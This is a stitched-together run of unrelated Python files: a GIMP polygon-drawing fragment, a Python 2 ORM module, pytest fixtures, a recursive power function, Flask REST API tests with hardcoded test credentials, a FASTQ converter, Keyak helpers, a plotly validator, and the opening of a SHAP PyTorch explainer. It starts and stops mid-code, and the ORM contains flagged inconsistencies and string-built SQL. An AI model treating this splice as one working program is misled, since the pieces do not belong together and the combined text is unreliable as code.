        points_list.append(int(round(math.sin(point_degree)*size)))
        points_list.append(int(round(math.cos(point_degree)*size)))
    fade_out=0
    method=0
    gradient_length=0
    gimp_be.pdb.gimp_paintbrush(drawable, fade_out, len(points_list), points_list, method, gradient_length)

def drawFrygon(sides=5,size=300,x_pos=0,y_pos=0, angle_offset=0):
    """Stroke a distorted polygon ("frygon") centered at (x_pos, y_pos).

    Unlike drawPolygon, the angle is fed to sin/cos in DEGREES (no radians
    conversion) and the sin/cos terms are applied to y/x respectively —
    presumably the deliberate source of the distortion; confirm intended.
    A center coordinate of 0 falls back to the image center, with x_pos
    only defaulted when y_pos is also 0 (same asymmetry as drawPolygon).
    """
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if y_pos==0:
        y_pos=image.height/2
        if x_pos==0:
            x_pos=image.width/2
    degree_between_points=360/sides
    points_list=[]
    for x in range(0,sides+1):
        point_degree=degree_between_points*x+angle_offset
        points_list.append(int(round(math.sin(point_degree)*size))+y_pos)
        points_list.append(int(round(math.cos(point_degree)*size))+x_pos)
    fade_out=0
    method=0
    gradient_length=0
    gimp_be.pdb.gimp_paintbrush(drawable, fade_out, len(points_list), points_list, method, gradient_length)

def drawFrygonGrid(size=120,sides=13):
    """Tile the canvas with frygons; odd side counts use a staggered layout.

    NOTE(review): relies on module globals `height` and `width`, which are
    not defined in this module — they must be injected at runtime or this
    raises NameError; confirm where they come from.
    """
    global height, width
    if sides%2 == 1:
        # Staggered layout: every other frygon is shifted by half a cell.
        for x in range(0,height,size):
            x_deep=0
            for y in range(0, width,size):
                if x_deep%2==1:
                    drawFrygon(sides,size,x,y-(size/2),0)
                else:
                    drawFrygon(sides,size,x,y,0)
                x_deep=x_deep+1
    else:
        for x in range(0,height, size):
            for y in range(0, width, size):
                drawFrygon(sides,size,x,y,0)

#!/usr/bin/env python
# coding:utf-8

"""
Database operation module. This module is independent of the web module.
"""

import time, logging

import db

class Field(object):
    """Base class describing one mapped database column."""

    # Class-wide counter used to stamp declaration order onto instances.
    _count = 0

    def __init__(self, **kw):
        get = kw.get
        self.name = get('name', None)
        self.ddl = get('ddl', '')
        self._default = get('default', None)

        self.comment = get('comment', '')
        self.nullable = get('nullable', False)
        self.updatable = get('updatable', True)
        self.insertable = get('insertable', True)

        self.unique_key = get('unique_key', False)
        self.non_unique_key = get('key', False)
        self.primary_key = get('primary_key', False)

        # Remember declaration order so DDL columns come out in order.
        self._order = Field._count
        Field._count += 1

    @property
    def default(self):
        """Default column value; a callable default is invoked on each access."""
        value = self._default
        if callable(value):
            return value()
        return value

    def __str__(self):
        head = '<%s:%s,%s,default(%s),' % (self.__class__.__name__, self.name, self.ddl, self._default)
        flags = ''
        # Flag letters: N=nullable, U=updatable, I=insertable.
        for enabled, mark in ((self.nullable, 'N'), (self.updatable, 'U'), (self.insertable, 'I')):
            if enabled:
                flags += mark
        return head + flags + '>'

class StringField(Field):
    """String column; defaults to '' stored as varchar(255)."""

    def __init__(self, **kw):
        kw.setdefault('default', '')
        kw.setdefault('ddl', 'varchar(255)')
        super(StringField, self).__init__(**kw)

class IntegerField(Field):
    """Integer column; defaults to 0 stored as bigint."""

    def __init__(self, **kw):
        kw.setdefault('default', 0)
        kw.setdefault('ddl', 'bigint')
        super(IntegerField, self).__init__(**kw)

class FloatField(Field):
    """Floating-point column; defaults to 0.0 stored as real."""

    def __init__(self, **kw):
        kw.setdefault('default', 0.0)
        kw.setdefault('ddl', 'real')
        super(FloatField, self).__init__(**kw)

class BooleanField(Field):
    """Boolean column; defaults to False stored as bool."""

    def __init__(self, **kw):
        kw.setdefault('default', False)
        kw.setdefault('ddl', 'bool')
        super(BooleanField, self).__init__(**kw)

class TextField(Field):
    """Long-text column; defaults to '' stored as text."""

    def __init__(self, **kw):
        kw.setdefault('default', '')
        kw.setdefault('ddl', 'text')
        super(TextField, self).__init__(**kw)

class BlobField(Field):
    """Binary column; defaults to '' stored as blob."""

    def __init__(self, **kw):
        kw.setdefault('default', '')
        kw.setdefault('ddl', 'blob')
        super(BlobField, self).__init__(**kw)

class VersionField(Field):
    """Bigint column intended for optimistic-locking version counters (default 0)."""

    def __init__(self, name=None):
        kw = {'name': name, 'default': 0, 'ddl': 'bigint'}
        super(VersionField, self).__init__(**kw)


class DateTimeField(Field):
    """Timestamp column stored as datetime."""

    def __init__(self, **kw):
        kw.setdefault('ddl', 'datetime')
        super(DateTimeField, self).__init__(**kw)


class DateField(Field):
    """Calendar-date column stored as date."""

    def __init__(self, **kw):
        kw.setdefault('ddl', 'date')
        super(DateField, self).__init__(**kw)


class EnumField(Field):
    """Enumeration column stored as enum."""

    def __init__(self, **kw):
        kw.setdefault('ddl', 'enum')
        super(EnumField, self).__init__(**kw)

_triggers = frozenset(['pre_insert', 'pre_update', 'pre_delete'])

def _gen_sql(table_name, mappings):
    pk, unique_keys, keys = None, [], []
    sql = ['-- generating SQL for %s:' % table_name, 'create table `%s` (' % table_name]
    for f in sorted(mappings.values(), lambda x, y: cmp(x._order, y._order)):
        if not hasattr(f, 'ddl'):
            raise StandardError('no ddl in field "%s".' % f)
        ddl = f.ddl
        nullable = f.nullable
        has_comment = not (f.comment == '')
        has_default = f._default is not None
        left = nullable and '  `%s` %s' % (f.name, ddl) or '  `%s` %s not null' % (f.name, ddl)
        mid = has_default and ' default \'%s\'' % f._default or None
        right = has_comment and ' comment \'%s\',' % f.comment or ','
        line = mid and '%s%s%s' % (left, mid, right) or '%s%s' % (left, right)
        if f.primary_key:
            pk = f.name
            line = '  `%s` %s not null auto_increment,' % (f.name, ddl)
        elif f.unique_key:
            unique_keys.append(f.name)
        elif f.non_unique_key:
            keys.append(f.name)
        sql.append(line)
    for uk in unique_keys:
        sql.append('  unique key(`%s`),' % uk)
    for k in keys:
        sql.append('  key(`%s`),' % k)
    sql.append('  primary key(`%s`)' % pk)
    sql.append(')ENGINE=InnoDB DEFAULT CHARSET=utf8;')
    return '\n'.join(sql)

class ModelMetaclass(type):
    """
    Metaclass for model objects.

    Collects every Field attribute of the class being created into a
    `__mappings__` dict, removes those attributes from the class body,
    and attaches `__table__`, `__primary_key__`, `__sql__` and the
    `pre_insert`/`pre_update`/`pre_delete` trigger slots.
    """
    def __new__(cls, name, bases, attrs):
        # skip base Model class:
        if name == 'Model':
            return type.__new__(cls, name, bases, attrs)

        # store all subclasses info:
        if not hasattr(cls, 'subclasses'):
            cls.subclasses = {}
        if not name in cls.subclasses:
            # NOTE(review): this records the class *name* as both key and
            # value, not the class object itself -- confirm that is intended.
            cls.subclasses[name] = name
        else:
            logging.warning('Redefine class: %s', name)

        logging.info('Scan ORMapping %s...', name)
        mappings = dict()
        primary_key = None
        for k, v in attrs.iteritems():
            if isinstance(v, Field):
                if not v.name:
                    # A Field declared without an explicit name takes the
                    # attribute name it was bound to.
                    v.name = k
                logging.debug('Found mapping: %s => %s' % (k, v))
                # check duplicate primary key:
                if v.primary_key:
                    if primary_key:
                        raise TypeError('Cannot define more than 1 primary key in class: %s' % name)
                    if v.updatable:
                        # logging.warning('NOTE: change primary key to non-updatable.')
                        v.updatable = False
                    if v.nullable:
                        # logging.warning('NOTE: change primary key to non-nullable.')
                        v.nullable = False
                    primary_key = v
                mappings[k] = v
        # check exist of primary key:
        if not primary_key:
            raise TypeError('Primary key not defined in class: %s' % name)
        # Remove the Field descriptors so attribute access falls through to
        # Model.__getattr__/__setattr__ (dict-backed storage).
        for k in mappings.iterkeys():
            attrs.pop(k)
        if '__table__' not in attrs:
            # Default table name is the lowercased class name.
            attrs['__table__'] = name.lower()
        attrs['__mappings__'] = mappings
        attrs['__primary_key__'] = primary_key
        # Bound late: the lambda closes over this class's table and mappings.
        attrs['__sql__'] = lambda self: _gen_sql(attrs['__table__'], mappings)
        for trigger in _triggers:
            if trigger not in attrs:
                # Missing triggers become None so callers can truth-test them.
                attrs[trigger] = None
        return type.__new__(cls, name, bases, attrs)

class Model(dict):
    """
    Base class for ORM.

    >>> class User(Model):
    ...     id = IntegerField(primary_key=True)
    ...     name = StringField()
    ...     email = StringField(updatable=False)
    ...     passwd = StringField(default=lambda: '******')
    ...     last_modified = FloatField()
    ...     def pre_insert(self):
    ...         self.last_modified = time.time()
    >>> u = User(id=10190, name='Michael', email='orm@db.org')
    >>> r = u.insert()
    >>> u.email
    'orm@db.org'
    >>> u.passwd
    '******'
    >>> u.last_modified > (time.time() - 2)
    True
    >>> f = User.get(10190)
    >>> f.name
    u'Michael'
    >>> f.email
    u'orm@db.org'
    >>> f.email = 'changed@db.org'
    >>> r = f.update() # change email but email is non-updatable!
    >>> len(User.find_all())
    1
    >>> g = User.get(10190)
    >>> g.email
    u'orm@db.org'
    >>> r = g.mark_deleted()
    >>> len(db.select('select * from user where id=10190'))
    0
    >>> import json
    >>> print User().__sql__()
    -- generating SQL for user:
    create table `user` (
      `id` bigint not null,
      `name` varchar(255) not null,
      `email` varchar(255) not null,
      `passwd` varchar(255) not null,
      `last_modified` real not null,
      primary key(`id`)
    );
    """
    __metaclass__ = ModelMetaclass

    def __init__(self, **kw):
        super(Model, self).__init__(**kw)

    def __getattr__(self, key):
        # Expose dict keys as attributes: u.name is u['name'].
        try:
            return self[key]
        except KeyError:
            raise AttributeError(r"'Dict' object has no attribute '%s'" % key)

    def __setattr__(self, key, value):
        # Attribute writes go straight into the dict storage.
        self[key] = value

    @classmethod
    def get(cls, key_name, key_value):
        """
        Get by primary/unique key.
        """
        # NOTE(review): the doctest above calls User.get(10190) with a single
        # argument, which does not match this two-argument signature --
        # confirm which form real callers rely on before changing either.
        d = db.select_one('select * from %s where %s=?' % (cls.__table__, key_name), key_value)
        if not d:
            # TODO: change to logging?
            raise AttributeError("Can't find in [%s] where %s=[%s]" % (cls.__table__, key_name, key_value))
        return cls(**d) if d else None

    @classmethod
    def find_first(cls, where, *args):
        """
        Find by where clause and return one result. If multiple results found, 
        only the first one returned. If no result found, return None.
        """
        d = db.select_one('select * from %s %s' % (cls.__table__, where), *args)
        return cls(**d) if d else None

    @classmethod
    def find_all(cls, *args):
        """
        Find all and return list.
        """
        # NOTE(review): *args is accepted but never used in the query.
        L = db.select('select * from `%s`' % cls.__table__)
        return [cls(**d) for d in L]

    @classmethod
    def find_by(cls, cols, where, *args):
        """
        Find by where clause and return list.
        """
        L = db.select('select %s from `%s` %s' % (cols, cls.__table__, where), *args)
        # A single non-* column is returned as a flat list of values rather
        # than model instances.
        if cols.find(',') == -1 and cols.strip() != '*':
            return [d[0] for d in L]
        return [cls(**d) for d in L]

    @classmethod
    def count_all(cls):
        """
        Find by 'select count(pk) from table' and return integer.
        """
        return db.select_int('select count(`%s`) from `%s`' % (cls.__primary_key__.name, cls.__table__))

    @classmethod
    def count_by(cls, where, *args):
        """
        Find by 'select count(pk) from table where ... ' and return int.
        """
        return db.select_int('select count(`%s`) from `%s` %s' % (cls.__primary_key__.name, cls.__table__, where), *args)

    def update(self):
        # Fire the optional pre_update trigger (None when not defined).
        self.pre_update and self.pre_update()
        L = []
        args = []
        for k, v in self.__mappings__.iteritems():
            if v.updatable:
                if hasattr(self, k):
                    arg = getattr(self, k)
                else:
                    # Fill missing attributes from the field default so the
                    # row is written consistently.
                    arg = v.default
                    setattr(self, k, arg)
                L.append('`%s`=?' % k)
                args.append(arg)
        pk = self.__primary_key__.name
        args.append(getattr(self, pk))
        db.update('update `%s` set %s where %s=?' % (self.__table__, ','.join(L), pk), *args)
        return self

    def delete(self):
        # Fire the optional pre_delete trigger (None when not defined).
        self.pre_delete and self.pre_delete()
        pk = self.__primary_key__.name
        args = (getattr(self, pk), )
        db.update('delete from `%s` where `%s`=?' % (self.__table__, pk), *args)
        return self

    def insert(self):
        # Fire the optional pre_insert trigger (None when not defined).
        self.pre_insert and self.pre_insert()
        params = {}
        for k, v in self.__mappings__.iteritems():
            if v.insertable:
                if not hasattr(self, k):
                    setattr(self, k, v.default)
                params[v.name] = getattr(self, k)
        try:
            db.insert('%s' % self.__table__, **params)
        except Exception as e:
            logging.info(e.args)
            print "MySQL Model.insert() error: args=", e.args
            # TODO !!! generalize ORM return package
            # return {'status': 'Failure', 'msg': e.args,  'data': self}
            raise
        return self

if __name__ == '__main__':
    # Smoke test: verbose logging, connect the db module to a local test
    # database, recreate the `user` table, then run the doctests above.
    logging.basicConfig(level=logging.DEBUG)
    db.create_engine('www-data', 'www-data', 'test')
    db.update('drop table if exists user')
    db.update('create table user (id int primary key, name text, email text, passwd text, last_modified real)')
    import doctest
    doctest.testmod()

import pytest

from tests.base import Author, Post, Comment, Keyword, fake


def make_author():
    """Build an Author populated with random fake data."""
    fields = {
        "id": fake.random_int(),
        "first_name": fake.first_name(),
        "last_name": fake.last_name(),
        "twitter": fake.domain_word(),
    }
    return Author(**fields)


def make_post(with_comments=True, with_author=True, with_keywords=True):
    """Build a Post with optional comments, author and keywords attached."""
    if with_comments:
        comments = [make_comment() for _ in range(2)]
    else:
        comments = []
    if with_keywords:
        keywords = [make_keyword() for _ in range(3)]
    else:
        keywords = []
    author = make_author() if with_author else None
    author_id = author.id if author is not None else None
    return Post(
        id=fake.random_int(),
        title=fake.catch_phrase(),
        author=author,
        author_id=author_id,
        comments=comments,
        keywords=keywords,
    )


def make_comment(with_author=True):
    """Build a Comment, optionally attributed to a fresh fake Author."""
    if with_author:
        comment_author = make_author()
    else:
        comment_author = None
    return Comment(id=fake.random_int(), body=fake.bs(), author=comment_author)


def make_keyword():
    """Build a Keyword with a random fake word."""
    word = fake.domain_word()
    return Keyword(keyword=word)


@pytest.fixture()
def author():
    """A single randomly generated Author."""
    fake_author = make_author()
    return fake_author


@pytest.fixture()
def authors():
    """Three randomly generated Authors."""
    group = []
    for _ in range(3):
        group.append(make_author())
    return group


@pytest.fixture()
def comments():
    """Three randomly generated Comments."""
    group = []
    for _ in range(3):
        group.append(make_comment())
    return group


@pytest.fixture()
def post():
    """A fully populated Post (author, comments, keywords)."""
    fake_post = make_post()
    return fake_post


@pytest.fixture()
def post_with_null_comment():
    """A Post built without any comments."""
    fake_post = make_post(with_comments=False)
    return fake_post


@pytest.fixture()
def post_with_null_author():
    """A Post built without an author (author and author_id are None)."""
    fake_post = make_post(with_author=False)
    return fake_post


@pytest.fixture()
def posts():
    """Three fully populated Posts."""
    group = []
    for _ in range(3):
        group.append(make_post())
    return group

def recurPowerNew(base, exp):
    """Compute base**exp by recursive squaring.

    Exponents <= 0 return 1 (preserving the original behavior; negative
    exponents are not supported).
    """
    # Base case: anything to the power 0 (or below) is treated as 1.
    if exp <= 0:
        return 1

    # Even exponent: square the base and halve the exponent. Use floor
    # division so the exponent stays an integer on Python 3 as well --
    # plain '/' would yield a float there and the recursion would not
    # terminate at the integer base case.
    if exp % 2 == 0:
        return recurPowerNew(base * base, exp // 2)

    # Odd exponent: peel off one factor of base.
    return base * recurPowerNew(base, exp - 1)

'''
Testing class for the database API's course-related functions.

Authors: Ari Kairala, Petteri Ponsimaa
Originally adapted from Ivan's exercise 1 test class.
'''

import unittest, hashlib
import re, base64, copy, json, server
from database_api_test_common import BaseTestCase, db
from flask import json, jsonify
from exam_archive import ExamDatabaseErrorNotFound, ExamDatabaseErrorExists
from unittest import TestCase
from resources_common import COLLECTIONJSON, PROBLEMJSON, COURSE_PROFILE, API_VERSION

class RestCourseTestCase(BaseTestCase):
    '''
    RestCourseTestCase contains course related unit tests of the database API.
    '''

    # List of user credentials in exam_archive_data_dump.sql for testing purposes
    super_user = "bigboss"
    super_pw = hashlib.sha256("ultimatepw").hexdigest()
    admin_user = "antti.admin"
    admin_pw = hashlib.sha256("qwerty1234").hexdigest()
    basic_user = "testuser"
    basic_pw = hashlib.sha256("testuser").hexdigest()
    wrong_pw = "wrong-pw"

    test_course_template_1 = {"template": {
        "data": [
                 {"name": "archiveId", "value": 1},
                 {"name": "courseCode", "value": "810136P"},
                 {"name": "name", "value": "Johdatus tietojenk\u00e4sittelytieteisiin"},
                 {"name": "description", "value": "Lorem ipsum"},
                 {"name": "inLanguage", "value": "fi"},
                 {"name": "creditPoints", "value": 4},
                 {"name": "teacherId", "value": 1}]
    }
    }
    test_course_template_2 = {"template": {
        "data": [
                 {"name": "archiveId", "value": 1},
                 {"name": "courseCode", "value": "810137P"},
                 {"name": "name", "value": "Introduction to Information Processing Sciences"},
                 {"name": "description", "value": "Aaa Bbbb"},
                 {"name": "inLanguage", "value": "en"},
                 {"name": "creditPoints", "value": 5},
                 {"name": "teacherId", "value": 2}]
    }
    }

    course_resource_url =               '/exam_archive/api/archives/1/courses/1/'
    course_resource_not_allowed_url =   '/exam_archive/api/archives/2/courses/1/'
    courselist_resource_url =           '/exam_archive/api/archives/1/courses/'

    # Set a ready header for authorized admin user
    header_auth = {'Authorization': 'Basic ' + base64.b64encode(super_user + ":" + super_pw)}

    # Define a list of the sample contents of the database, so we can later compare it to the test results

    @classmethod
    def setUpClass(cls):
        print "Testing ", cls.__name__

    def test_user_not_authorized(self):
        '''
        Check that user in not able to get course list without authenticating.
        '''
        print '(' + self.test_user_not_authorized.__name__ + ')', \
            self.test_user_not_authorized.__doc__

        # Test CourseList/GET
        rv = self.app.get(self.courselist_resource_url)
        self.assertEquals(rv.status_code,401)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Test CourseList/POST
        rv = self.app.post(self.courselist_resource_url)
        self.assertEquals(rv.status_code,401)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Test Course/GET
        rv = self.app.get(self.course_resource_url)
        self.assertEquals(rv.status_code,401)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Test Course/PUT
        rv = self.app.put(self.course_resource_url)
        self.assertEquals(rv.status_code,401)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Test Course/DELETE
        rv = self.app.put(self.course_resource_url)
        self.assertEquals(rv.status_code,401)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Try to Course/POST when not admin or super user
        rv = self.app.post(self.courselist_resource_url, headers={'Authorization': 'Basic ' + \
                                                                base64.b64encode(self.basic_user + ":" + self.basic_pw)})
        self.assertEquals(rv.status_code,403)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Try to delete course, when not admin or super user
        rv = self.app.delete(self.course_resource_url, headers={'Authorization': 'Basic ' + \
                                                                base64.b64encode(self.basic_user + ":" + self.basic_pw)})
        self.assertEquals(rv.status_code,403)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Try to get Course list as basic user from unallowed archive
        rv = self.app.get(self.course_resource_not_allowed_url, headers={'Authorization': 'Basic ' + \
                                                                base64.b64encode(self.basic_user + ":" + self.basic_pw)})
        self.assertEquals(rv.status_code,403)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

        # Try to get Course list as super user with wrong password
        rv = self.app.get(self.courselist_resource_url, headers={'Authorization': 'Basic ' + \
                                                                base64.b64encode(self.super_user + ":" + self.wrong_pw)})
        self.assertEquals(rv.status_code,401)
        self.assertEquals(PROBLEMJSON,rv.mimetype)

    def test_user_authorized(self):
        '''
        Check that authenticated user is able to get course list.
        '''
        print '(' + self.test_user_authorized.__name__ + ')', \
            self.test_user_authorized.__doc__

        # Try to get Course list as basic user from the correct archive
        rv = self.app.get(self.course_resource_url, headers={'Authorization': 'Basic ' + \
                                                                base64.b64encode(self.basic_user + ":" + self.basic_pw)})
        self.assertEquals(rv.status_code,200)
        self.assertEquals(COLLECTIONJSON+";"+COURSE_PROFILE,rv.content_type)

        # User authorized as super user
        rv = self.app.get(self.courselist_resource_url, headers={'Authorization': 'Basic ' + \
                                                                base64.b64encode(self.super_user + ":" + self.super_pw)})
        self.assertEquals(rv.status_code,200)
        self.assertEquals(COLLECTIONJSON+";"+COURSE_PROFILE,rv.content_type)

    def test_course_get(self):
        '''
        Check data consistency of Course/GET and CourseList/GET.
        '''

        print '(' + self.test_course_get.__name__ + ')', \
            self.test_course_get.__doc__
        # Test CourseList/GET
        self._course_get(self.courselist_resource_url)
        # Test single course Course/GET
        self._course_get(self.course_resource_url)

    def _course_get(self, resource_url):
        '''
        Check data consistency of CourseList/GET.
        '''

        # Get all the courses from database
        courses = db.browse_courses(1)

        # Get all the courses from API
        rv = self.app.get(resource_url, headers=self.header_auth)
        self.assertEquals(rv.status_code,200)
        self.assertEquals(COLLECTIONJSON+";"+COURSE_PROFILE,rv.content_type)

        input = json.loads(rv.data)
        assert input

        # Go through the data
        data = input['collection']
        items = data['items']

        self.assertEquals(data['href'], resource_url)
        self.assertEquals(data['version'], API_VERSION)

        for item in items:
            obj = self._create_dict(item['data'])
            course = db.get_course(obj['courseId'])
            assert self._isIdentical(obj, course)

    def test_course_post(self):
        '''
        Check that a new course can be created.
        '''
        print '(' + self.test_course_post.__name__ + ')', \
            self.test_course_post.__doc__

        resource_url = self.courselist_resource_url
        new_course = self.test_course_template_1.copy()

        # Test CourseList/POST
        rv = self.app.post(resource_url, headers=self.header_auth, data=json.dumps(new_course))
        self.assertEquals(rv.status_code,201)

        # Post returns the address of newly created resource URL in header, in 'location'. Get the identifier of
        # the just created item, fetch it from database and compare.
        location = rv.location
        location_match = re.match('.*courses/([^/]+)/', location)
        self.assertIsNotNone(location_match)
        new_id = location_match.group(1)

        # Fetch the item from database and set it to course_id_db, and convert the filled post template data above to
        # similar format by replacing the keys with post data attributes.
        course_in_db = db.get_course(new_id)
        course_posted = self._convert(new_course)

        # Compare the data in database and the post template above.
        self.assertDictContainsSubset(course_posted, course_in_db)

        # Next, try to add the same course twice - there should be conflict
        rv = self.app.post(resource_url, headers=self.header_auth, data=json.dumps(new_course))
        self.assertEquals(rv.status_code,409)

        # Next check that by posting invalid JSON data we get status code 415
        invalid_json = "INVALID " + json.dumps(new_course)
        rv = self.app.post(resource_url, headers=self.header_auth, data=invalid_json)
        self.assertEquals(rv.status_code,415)

        # Check that template structure is validated
        invalid_json = json.dumps(new_course['template'])
        rv = self.app.post(resource_url, headers=self.header_auth, data=invalid_json)
        self.assertEquals(rv.status_code,400)

        # Check for the missing required field by removing the third row in array (course name)
        invalid_template = copy.deepcopy(new_course)
        invalid_template['template']['data'].pop(2)
        rv = self.app.post(resource_url, headers=self.header_auth, data=json.dumps(invalid_template))
        self.assertEquals(rv.status_code,400)

        # Lastly, delete the item
        rv = self.app.delete(location, headers=self.header_auth)
        self.assertEquals(rv.status_code,204)

    def test_course_put(self):
        '''
        Check that an existing course can be modified.
        '''
        print '(' + self.test_course_put.__name__ + ')', \
            self.test_course_put.__doc__

        resource_url = self.courselist_resource_url
        new_course = self.test_course_template_1
        edited_course =  self.test_course_template_2

        # First create the course
        rv = self.app.post(resource_url, headers=self.header_auth, data=json.dumps(new_course))
        self.assertEquals(rv.status_code,201)
        location = rv.location
        self.assertIsNotNone(location)

        # Then try to edit the course
        rv = self.app.put(location, headers=self.header_auth, data=json.dumps(edited_course))
        self.assertEquals(rv.status_code,200)
        location = rv.location
        self.assertIsNotNone(location)

        # Put returns the address of newly created resource URL in header, in 'location'. Get the identifier of
        # the just created item, fetch it from database and compare.
        location = rv.location
        location_match = re.match('.*courses/([^/]+)/', location)
        self.assertIsNotNone(location_match)
        new_id = location_match.group(1)

        # Fetch the item from database and set it to course_id_db, and convert the filled post template data above to
        # similar format by replacing the keys with post data attributes.
        course_in_db = db.get_course(new_id)
        course_posted = self._convert(edited_course)

        # Compare the data in database and the post template above.
        self.assertDictContainsSubset(course_posted, course_in_db)

        # Next check that by posting invalid JSON data we get status code 415
        invalid_json = "INVALID " + json.dumps(new_course)
        rv = self.app.put(location, headers=self.header_auth, data=invalid_json)
        self.assertEquals(rv.status_code,415)

        # Check that template structure is validated
        invalid_json = json.dumps(new_course['template'])
        rv = self.app.put(location, headers=self.header_auth, data=invalid_json)
        self.assertEquals(rv.status_code,400)

        # Lastly, we delete the course
        rv = self.app.delete(location, headers=self.header_auth)
        self.assertEquals(rv.status_code,204)

    def test_course_delete(self):
        '''
        Check that course in not able to get course list without authenticating.
        '''
        print '(' + self.test_course_delete.__name__ + ')', \
            self.test_course_delete.__doc__

        # First create the course
        resource_url = self.courselist_resource_url
        rv = self.app.post(resource_url, headers=self.header_auth, data=json.dumps(self.test_course_template_2))
        self.assertEquals(rv.status_code,201)
        location = rv.location
        self.assertIsNotNone(location)

        # Get the identifier of the just created item, fetch it from database and compare.
        location = rv.location
        location_match = re.match('.*courses/([^/]+)/', location)
        self.assertIsNotNone(location_match)
        new_id = location_match.group(1)

        # Then, we delete the course
        rv = self.app.delete(location, headers=self.header_auth)
        self.assertEquals(rv.status_code,204)

        # Try to fetch the deleted course from database - expect to fail
        self.assertIsNone(db.get_course(new_id))

    def test_for_method_not_allowed(self):
        '''
        For inconsistency check for 405, method not allowed.
        '''

        print '(' + self.test_course_get.__name__ + ')', \
            self.test_course_get.__doc__

        # CourseList/PUT should not exist
        rv = self.app.put(self.courselist_resource_url, headers=self.header_auth)
        self.assertEquals(rv.status_code,405)

        # CourseList/DELETE should not exist
        rv = self.app.delete(self.courselist_resource_url, headers=self.header_auth)
        self.assertEquals(rv.status_code,405)

        # Course/POST should not exist
        rv = self.app.post(self.course_resource_url, headers=self.header_auth)
        self.assertEquals(rv.status_code,405)

    def _isIdentical(self, api_item, db_item):
        '''
        Check whether template data corresponds to data stored in the database.
        '''

        return api_item['courseId'] == db_item['course_id'] and \
               api_item['name'] == db_item['course_name'] and \
               api_item['archiveId'] == db_item['archive_id'] and \
               api_item['description'] == db_item['description'] and \
               api_item['inLanguage'] == db_item['language_id'] and \
               api_item['creditPoints'] == db_item['credit_points'] and \
               api_item['courseCode'] == db_item['course_code']

    def _convert(self, template_data):
        '''
        Convert template data to a dictionary representing the format the data is saved in the database.
        '''

        trans_table = {"name":"course_name", "url":"url", "archiveId":"archive_id", "courseCode":"course_code",
                       "dateModified": "modified_date", "modifierId":"modifier_id", "courseId":"course_id",
                       "description":"description", "inLanguage":"language_id", "creditPoints":"credit_points",
                       "teacherId":"teacher_id", "teacherName":"teacher_name"}
        data = self._create_dict(template_data['template']['data'])

        db_item = {}
        for key, val in data.items():
            db_item[trans_table[key]] = val

        return db_item

    def _create_dict(self,item):
        '''
        Create a dictionary from template data for easier handling.
        '''

        dict = {}
        for f in item:
            dict[f['name']] = f['value']

        return dict

if __name__ == '__main__':
    # Run the course-related REST API test suite directly.
    print 'Start running tests'
    unittest.main()

#!/usr/bin/env python2.7
import sys
for line in open(sys.argv[1]):
	cut=line.split('\t')
	if len(cut)<11: continue
	print ">"+cut[0]
	print cut[9]
	print "+"
	print cut[10]

# -*- coding: utf-8 -*-
# Keyak v2 implementation by Jos Wetzels and Wouter Bokslag
# hereby denoted as "the implementer".

# Based on Keccak Python and Keyak v2 C++ implementations
# by the Keccak, Keyak and Ketje Teams, namely, Guido Bertoni,
# Joan Daemen, Michaël Peeters, Gilles Van Assche and Ronny Van Keer
#
# For more information, feedback or questions, please refer to:
# http://keyak.noekeon.org/
# http://keccak.noekeon.org/
# http://ketje.noekeon.org/

from StringIO import StringIO

class stringStream(StringIO):
	"""StringIO subclass with byte-oriented helpers (peek/get/put/erase)."""

	def peek(self):
		"""Return the next byte as an int without consuming it, or None at EOF."""
		pos = self.tell()
		ch = self.read(1)
		self.seek(pos, 0)
		return ord(ch) if ch else None

	def get(self):
		"""Consume and return one byte as its integer value."""
		return ord(self.read(1))

	def put(self, b):
		"""Write one byte given as an integer."""
		self.write(chr(b))

	def erase(self):
		"""Discard all buffered contents and rewind to the start."""
		self.truncate(0)
		self.seek(0, 0)

	def setvalue(self, s):
		"""Replace the buffered contents with s."""
		self.erase()
		self.write(s)

def hasMore(I):
	"""Return True while stream I still has at least one byte to read."""
	# peek() yields an int (possibly 0) or None at EOF, so compare identity
	# with None rather than using `!=` (PEP 8).
	return I.peek() is not None

def enc8(x):
	"""Return x unchanged when it fits in a single byte, else raise."""
	if x > 255:
		raise Exception("The integer %d cannot be encoded on 8 bits." % x)
	return x

# Constant-time comparison from the Django source: https://github.com/django/django/blob/master/django/utils/crypto.py
# Is constant-time only if both strings are of equal length but given the use-case that is always the case.
def constant_time_compare(val1, val2):
    """Compare two strings without short-circuiting on the first mismatch."""
    if len(val1) != len(val2):
        return False
    mismatch = 0
    # Accumulate every character difference so timing does not reveal the
    # position of the first mismatching byte.
    for ch1, ch2 in zip(val1, val2):
        mismatch |= ord(ch1) ^ ord(ch2)
    return not mismatch
import _plotly_utils.basevalidators


class BordercolorValidator(_plotly_utils.basevalidators.ColorValidator):
    """Color validator for the sankey.hoverlabel.bordercolor attribute."""

    def __init__(
        self, plotly_name="bordercolor", parent_name="sankey.hoverlabel", **kwargs
    ):
        # Pull overridable defaults out of kwargs before delegating.
        array_ok = kwargs.pop("array_ok", True)
        edit_type = kwargs.pop("edit_type", "calc")
        super(BordercolorValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            array_ok=array_ok,
            edit_type=edit_type,
            **kwargs
        )

import numpy as np
import warnings
from .._explainer import Explainer
from packaging import version
torch = None


class PyTorchDeep(Explainer):

    def __init__(self, model, data):
        """Build a deep explainer around a PyTorch model.

        model: a module, or a (model, layer) tuple to explain an interim
            layer's inputs instead of the model inputs.
        data: background data -- a single tensor or a list of tensors.
        """
        # try and import pytorch
        global torch
        if torch is None:
            import torch
            if version.parse(torch.__version__) < version.parse("0.4"):
                warnings.warn("Your PyTorch version is older than 0.4 and not supported.")

        # check if we have multiple inputs
        self.multi_input = False
        if type(data) == list:
            self.multi_input = True
        if type(data) != list:
            # Normalize to a list so the model can always be called as model(*data).
            data = [data]
        self.data = data
        self.layer = None
        self.input_handle = None
        self.interim = False
        self.interim_inputs_shape = None
        self.expected_value = None  # to keep the DeepExplainer base happy
        if type(model) == tuple:
            # Interim-layer mode: record the shapes of the chosen layer's
